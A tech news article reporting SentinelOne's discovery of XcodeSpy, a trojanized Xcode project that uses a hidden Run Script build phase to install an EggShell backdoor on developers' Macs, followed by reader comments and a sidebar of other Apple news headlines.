Security Researchers Discover XcodeSpy Malware That Targets Developers

Developers need to look out for "XcodeSpy," a malicious Xcode project that installs a custom variant of the "EggShell" backdoor on a macOS computer, according to new research shared today by SentinelOne (via Ars Technica).

iu 2 1
Xcode is software designed for developers who want to write apps for the iOS and macOS platforms, and the malicious project that's circulating mirrors TabBarInteraction, a legitimate open source project.

Developers who download the XcodeSpy project think they're getting TabBarInteraction, but the malware includes a hidden "run Script" executable that downloads and installs the EggShell open source back door that's able to spy on users through the microphone, camera, and keyboard as well as upload and download files.

Two variants of the custom EggShell attack were found to be uploaded in Japan, first in August and then in October, so this is an attack that's been out in the wild for some time.

We have thus far been unable to discover other samples of trojanized Xcode projects and cannot gauge the extent of this activity. However, the timeline from known samples and other indicators mentioned below suggest that other XcodeSpy projects may exist. By sharing details of this campaign, we hope to raise awareness of this attack vector and highlight the fact that developers are high-value targets for attackers.

SentinelOne says that all Apple Developers that use Xcode should exercise caution when using shared Xcode projects.

Tag: Xcode

Top Rated Comments

jonnysods Avatar
7 months ago
Get ready for lots of Justin Long Intel videos about this next week.
Score: 9 Votes (Like | Disagree)
Apple_Robert Avatar
27 weeks ago

Laughing on my Linux developer laptop.
What is so funny? It's not like Linux hasn't had Malware problems.
Score: 7 Votes (Like | Disagree)
I7guy Avatar
7 months ago
Comes under the heading, be very careful about what you download.
Score: 6 Votes (Like | Disagree)
hot-gril Avatar
7 months ago

Why is it being called a Trojan when it has to be actively installed?
Cause that's what trojans are.
Score: 5 Votes (Like | Disagree)
hot-gril Avatar
27 weeks ago

Comes under the heading, be very careful about what you download.
Xcode does warn you when opening an xcodeproj downloaded from the Internet, but given how frequently you legitimately have to open and build random projects, I wish there were better sandboxing. The "run script" phase runs arbitrary code, ofc necessary when building many things but also an attack vector.

Edit: And even if you're not manually opening/building projects, you're probably using Cocoapods, which is. Of course other dev platforms have similar risks.
Score: 4 Votes (Like | Disagree)
Unsupported Avatar
27 weeks ago

Why is it being called a Trojan when it has to be actively installed?
https://usa.kaspersky.com/resource-center/threats/trojans

A Trojan horse or Trojan is a type of malware that is often disguised as legitimate software. Trojans can be employed by cyber-thieves and hackers trying to gain access to users' systems. Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems. Once activated, Trojans can enable cyber-criminals to spy on you, steal your sensitive data, and gain backdoor access to your system. These actions can include:

•Deleting data
•Blocking data
•Modifying data
•Copying data
•Disrupting the performance of computers or computer networks


Modifying data?

So it could infect the project that the developer is working on?

Nasty!
Score: 3 Votes (Like | Disagree)

Top Stories

wwdc 2021 details

WWDC is One Week Away: Five Steps to Get Ready

Monday May 31, 2021 11:16 am PDT by
We're just one week away from WWDC 2021, which kicks off next Monday, June 7 and runs through Friday, June 11. Apple's annual developers conference will be an all-digital affair for the second year in a row due to public health measures, but it will still be an exciting week, with Apple expected to unveil iOS 15 and other new software updates. Ahead of WWDC, we've put together five steps to...
wwdc 2021 details

Apple Highlights Winners of WWDC 2021 Swift Student Challenge

Tuesday June 1, 2021 5:13 am PDT by
Apple today highlighted some winners of this year's Swift Student Challenge, which gives young developers a chance to win special attire and apparel for the annual developer conference. This year, more than 350 winners from more than 35 countries around the world have been selected. Apple highlights a few developers who have won this year's challenge, including Abinaya Dinesh, who created...
airdrop logo

Researchers Discover AirDrop Security Flaw That Could Expose Personal Data to Strangers

Friday April 23, 2021 4:36 am PDT by
AirDrop is a feature that allows Apple devices to securely and conveniently transfer files, photos, and more between each other wirelessly. Users can share items with their own devices, friends, family, or even strangers. The convenience and ease of use, however, may be undermined by a newly discovered security flaw. Researchers at TU Darmstadt have discovered that the process which AirDrop...
apple wwdc app developer academy global stats

Apple Further Expands Developer Academy Program With First Detroit Applications Opening This Week

Wednesday May 12, 2021 5:39 am PDT by
Apple today released an update on the progress of the Apple Developer Academy program, ahead of applications for the new Detroit site opening this week. The Apple Developer Academy sets out to provide enrolled students with app development training and entrepreneurial skills. Apple offers two different training programs: 30-day foundation courses that cover specific topics, such as an...
Apple TV Ray Light 2 Triad

Apple Inks Deal for 'The Big Door Prize' From 'Schitt's Creek' Writer

Friday May 28, 2021 1:42 pm PDT by
Apple has won the rights to "The Big Door Prize," a half-hour comedy based on M.O. Walsh's bestselling novel of the same name, reports Deadline. Apple was involved in a bidding war for the series, winning out over multiple other bidders. The project, headed up by "Schitt's Creek" writer and executive producer David West Read, will consist of 10 half-hour episodes. Read is writing the...
homekit devices feature orange3

Apple-Backed 'Project CHIP' to Start Smart Home Device Certification in Late 2021

Friday April 16, 2021 8:55 am PDT by
In late 2019, Apple along with Amazon, Google, and the Zigbee Alliance announced plans to develop a universal standard for smart home products, leveraging existing protocols like Apple's HomeKit, Amazon's Alexa, and Google's Weave. The so-called "Project Connected Home over IP" or "Project CHIP" aims to make it easier for device manufacturers to build devices that are compatible with a...
watchOS 8 on Apple Watch feature

Apple Seeds First Beta of watchOS 8 to Developers

Monday June 7, 2021 12:04 pm PDT by
In addition to seeding the first betas of iOS 15, iPadOS 15, tvOS 15, and macOS 12, Apple has also seeded the first beta of the watchOS 8 update to developers for testing purposes. To install watchOS 8, developers will need to download the configuration profile from the Apple Developer Center. Once installed, watchOS 8 can be downloaded through the dedicated Apple Watch app on the iPhone by ...
14

iOS 14.5 to Make Zero-Click Attacks 'Significantly Harder'

Monday February 22, 2021 9:05 am PST by
Apple's impending iOS and iPadOS 14.5 update will make zero-click attacks considerably more difficult by extending PAC security provisions, according to Motherboard. Apple has made a change to the way in which it secures its code in the latest betas of iOS 14.5 and iPadOS 14.5 to make zero-click attacks much harder. The change, spotted by security researchers, has now been confirmed by...
paypal hack

Researcher Breaches Systems of Over 35 Companies, Including Apple, Microsoft, and PayPal

Wednesday February 10, 2021 7:31 am PST by
A security researcher was able to breach the internal systems of over 35 major companies, including Apple, Microsoft, and PayPal, using a software supply chain attack (via Bleeping Computer). Security researcher Alex Birsan was able to exploit a unique design flaw in some open-source ecosystems called "dependency confusion" to attack the systems of companies such as Apple, Microsoft,...
Apple car wheel icon feature triad

Apple Seen in Vehicle Supply Chains, but It May Be Exploring Taxi Service or Car Platform Instead

Monday May 24, 2021 6:49 am PDT by
Apple is intensely researching all aspects of car engineering and manufacturing, but there are growing questions around what form Apple's vehicle project may take, according to a report from the Wall Street Journal. Speaking to the Wall Street Journal, Peter Fintl, the director of technology and innovation for Capgemini Engineering Germany, explained that Apple's movement in vehicle supply...